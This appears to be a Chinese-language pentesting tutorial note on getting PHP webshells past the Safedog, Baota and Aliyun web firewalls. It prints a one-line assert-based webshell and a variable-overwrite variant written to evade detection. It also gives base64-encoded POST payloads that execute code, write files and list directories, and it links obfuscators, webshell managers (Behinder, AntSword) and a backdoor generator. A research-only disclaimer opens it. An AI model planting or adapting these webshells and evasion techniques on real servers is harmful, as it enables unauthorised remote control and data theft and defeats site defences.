免责声明: 内容仅用于技术研究,禁止使用文章中的技术进行非法行为,如利用文章中技术进行非法行为造成的后果与本文作者无关。
#Safedog代码层手写及脚本绕过
变量覆盖,加密混淆,异或生成
#BT Aliyun代码层手写及脚本绕过
编码解码(变量覆盖,加密混淆,异或生成)
ASP,PHP,ASPX,JSP,PY等后门免杀同理
http://test.xxx.com/x.php?id=x
mr6=cGhwaW5mbygpOw==
http://test.xxx.com/xx.php?x=b&y=assert
z=cGhwaW5mbygpOw== 执行代码
z=ZmlsZV9wdXRfY29udGVudHMoInRlc3QudHh0IiwiMSIpOw== 写入文件
z=dmFyX2R1bXAoc2NhbmRpcigiLiIpKTs= 读取文件
菜刀,蚁剑,冰蝎优缺点
菜刀:未更新状态,无插件,单向加密传输
蚁剑:更新状态,有插件,拓展性强,单向加密传输
冰蝎:更新状态,未知插件,双向加密传输
演示案例:
➢ Safedog-手写覆盖变异简易代码绕过-代码层
一句话木马:<?php assert($_POST['chopper']);?>
替换成:
<?php
$a=$_GET['x'];
$$a=$_GET['y'];
$b($_POST['z']);
?>
可以绕过safedog
//x=b&y=assert
//$a=b $$a=assert=$b assert($_POST['z']);
上传成功后,
例:http://127.0.0.1:8081/x/1.php?x=b&y=assert
再(可以用hackbar插件)postdata:z=phpinfo()
➢ Safedog-基于接口类加密混淆代码绕过-代码层
https://www.phpjiami.com/phpjiami.html
➢ BT,Aliyun-基于覆盖加密变异下编码解码绕过-代码层
https://www.phpjiami.com/phpjiami.html
➢ Safedog-基于工具功能数据包指纹修改变异绕过-行为层
https://pan.baidu.com/s/1msqO2kps139NNP9ZEIAVHw 提取码:xiao
基于python开发的一个工具,打开后运行php-venom-3.3.py即可生成免杀后门文件。
也可以自己二次开发,代码不难。
上传成功后使用例(base64加密):http://www.xxx.com/text.php?id=dxads
post data: mr6=cGhwaW5maSgpOw==
//cGhwaW5maSgpOw== 为phpinfo();的base64加密
➢ Safedog,BT,Aliyun-基于冰蝎新型控制器绕过全面测试-行为层
➢ Safedog,BT,Aliyun-基于手写新型控制器绕过全面测试-行为层
涉及资源:
混淆加密工具:https://github.com/djunny/enphp
https://www.phpjiami.com/phpjiami.html
冰蝎:https://github.com/rebeyond/Behinder/releases/
蚁剑:https://github.com/AntSwordProject/antSword/releases
webshell-venom-master:https://pan.baidu.com/s/1msqO2kps139NNP9ZEIAVHw 提取码:xiao